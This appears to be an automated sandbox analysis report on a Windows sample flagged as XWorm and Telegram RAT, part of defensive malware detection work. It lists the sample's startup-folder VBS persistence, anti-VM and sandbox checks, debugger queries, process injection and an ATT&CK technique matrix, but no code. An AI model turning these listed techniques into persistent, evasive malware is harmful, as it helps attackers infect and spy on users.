                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.csHigh entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.csHigh entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.csHigh entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.csHigh entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csHigh entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.csHigh entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
                  Source: 0.2.Ref#103052.exe.6000000.8.raw.unpack, GR3kyE6pOowqFD2rqb9.csHigh entropy of concatenated method names: 'xjZ6k7XHtc', 'qa06LGduP2', 'sV96T5wiGJ', 'kkn69sK8Zl', 'wmT6hljfbb', 'DTb63GQX4s', 'pqY6EiI1hl', 'acE6CT1sKY', 'BZm6x6w287', 'PMn6Xl35SC'
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile created: C:\Users\user\AppData\Roaming\Wnuth.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbsJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbsJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 7060, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory allocated: 4540000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory allocated: F30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory allocated: 4C30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exe TID: 5488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exe TID: 5488Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exe TID: 3924Thread sleep count: 201 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exe TID: 3924Thread sleep count: 284 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeThread delayed: delay time: 100000Jump to behavior
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: Ref#103052.exe, 00000000.00000002.2265574582.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Ref#103052.exeMemory written: C:\Users\user\Desktop\Ref#103052.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess created: C:\Users\user\Desktop\Ref#103052.exe "C:\Users\user\Desktop\Ref#103052.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeQueries volume information: C:\Users\user\Desktop\Ref#103052.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeQueries volume information: C:\Users\user\Desktop\Ref#103052.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 7060, type: MEMORYSTR
                  Yara detected XWorm
                  Source: Yara matchFile source: 8.2.Ref#103052.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.26ba7b8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 7060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 1240, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 7060, type: MEMORYSTR
                  Yara detected XWorm
                  Source: Yara matchFile source: 8.2.Ref#103052.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.26ba7b8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 7060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 1240, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts1
                  Scheduled Task/Job                  		1
                  Scripting                  		111
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping211
                  Security Software Discovery                  		Remote Services11
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Registry Run Keys / Startup Folder                  		2
                  Registry Run Keys / Startup Folder                  		41
                  Virtualization/Sandbox Evasion                  		Security Account Manager41
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		111
                  Process Injection                  		NTDS13
                  System Information Discovery                  		Distributed Component Object ModelInput Capture113
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Obfuscated Files or Information                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

